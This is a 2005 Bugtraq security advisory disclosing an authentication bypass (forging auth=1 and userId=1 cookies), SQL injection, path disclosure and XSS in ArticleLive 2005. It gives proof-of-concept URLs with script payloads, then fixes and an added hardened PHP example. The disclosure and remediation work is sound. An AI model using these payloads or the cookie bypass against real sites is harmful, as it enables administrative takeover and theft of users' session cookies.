List: bugtraq
Subject: Authentication bypass, sql injections and xss in ArticleLive 2005
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-05-03 20:55:27
Message-ID: 20050503205527.1033.qmail () www ! securityfocus ! com
Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
***SPECIAL OFFER***
Hire my auditing services; if I don't find anything, it's FREE..!! http://www.digitalparadox.org/services.ah
Looking for publishers interested in my PHP Secure Coding Book.
Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005
Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: ArticleLive 2005 contains an authentication bypass, SQL injection and cross-site scripting (XSS) vulnerabilities.
Proof of Concept Exploits:
http://www.example.com/admin/?
Full administrative authentication bypass
In the control panel, setting the cookies auth=1 and userId=1 grants full administrative access: the application trusts these client-supplied cookie values as proof of login.
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='&Categories=0
Information Disclosure / Full Path Disclosure
Warning: Wrong datatype for second argument in call to in_array in /home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460
Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default (Stretched)/Panels/SearchResultsPanel.php on line 163
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
XSS
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
XSS
Possible Fixes: Using htmlspecialchars() before echoing user-supplied data to the page, and mysql_escape_string(), mysql_real_escape_string() or similar functions (or parameterised queries) before passing user input to the MySQL database, would solve these problems. The authentication bypass requires that login state be kept server-side (in the session) rather than read back from client-controlled cookies.
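The following is an added example, not ArticleLive's code and not from the advisory's author, showing the hardened counterpart to each issue class above in modern PHP (7+ with mysqli/mysqlnd assumed). The table and column names (users, articles, passwordHash, isAdmin) and the function names are hypothetical; the weak cookie check is shown only to contrast it with the session-based check that replaces it.

```php
<?php
// Added example (hypothetical names, not ArticleLive code).

// 1. Authentication state. The advisory's bypass works because privilege is
//    read straight out of client-controlled cookies (auth=1, userId=1).
function isAdminFromCookie(array $cookie): bool {            // weak pattern
    return isset($cookie['auth']) && $cookie['auth'] == '1';  // anyone can set this
}

function isAdminFromSession(array $session): bool {          // hardened pattern
    // Written only by loginHandler() after a verified password; the browser
    // holds just an opaque session id and cannot write server-side session data.
    return isset($session['isAdmin']) && $session['isAdmin'] === true;
}

function loginHandler(mysqli $db, string $username, string $password): bool {
    $stmt = $db->prepare('SELECT userId, passwordHash, isAdmin FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null || !password_verify($password, $row['passwordHash'])) {
        return false;
    }
    // The advisory URLs carry PHPSESSID in the query string; rotate the id on
    // login so a session id handed to the victim beforehand is worthless.
    session_regenerate_id(true);
    $_SESSION['userId']  = (int) $row['userId'];
    $_SESSION['isAdmin'] = (bool) $row['isAdmin'];
    return true;
}

// 2. Database access: a parameterised query instead of string concatenation,
//    so a quote in Query= is data, not SQL syntax.
function searchArticles(mysqli $db, string $query, array $categoryIds): array {
    // Guard the in_array()/implode() misuse seen in the disclosed warnings:
    // coerce the category filter to a list of integers before using it.
    $ids = array_map('intval', $categoryIds);
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "SELECT articleId, title FROM articles WHERE title LIKE ? AND categoryId IN ($placeholders)"
    );
    $like  = '%' . $query . '%';
    $types = 's' . str_repeat('i', count($ids));
    $stmt->bind_param($types, $like, ...$ids);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// 3. Output encoding at the point of echo. ENT_QUOTES encodes both quote
//    characters, so the '"><script> payloads above render as inert text; '<'
//    is encoded too, which also neutralises the </textarea> break-out.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderRegisterForm(array $fields): string {
    $html = '';
    foreach (['Username', 'FirstName', 'LastName', 'Email'] as $name) {
        $html .= '<input name="' . $name . '" value="' . h($fields[$name] ?? '') . '">' . "\n";
    }
    $html .= '<textarea name="Biography">' . h($fields['Biography'] ?? '') . '</textarea>' . "\n";
    return $html;
}

// 4. Error handling. The full-path disclosure comes from PHP warnings being
//    echoed to the client; on a production host log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('session.use_only_cookies', '1');  // ignore PHPSESSID passed in the URL
```

Each function is independent, so the output-encoding helper h() can be dropped into an existing template without touching the database layer, and the session-based check can replace the cookie check without changing the login form. The page's suggested mysql_real_escape_string() remains a valid fix for the injection alone; the prepared statement here is an alternative that removes the need to escape at every call site.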
Keep yourself updated; RSS feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/.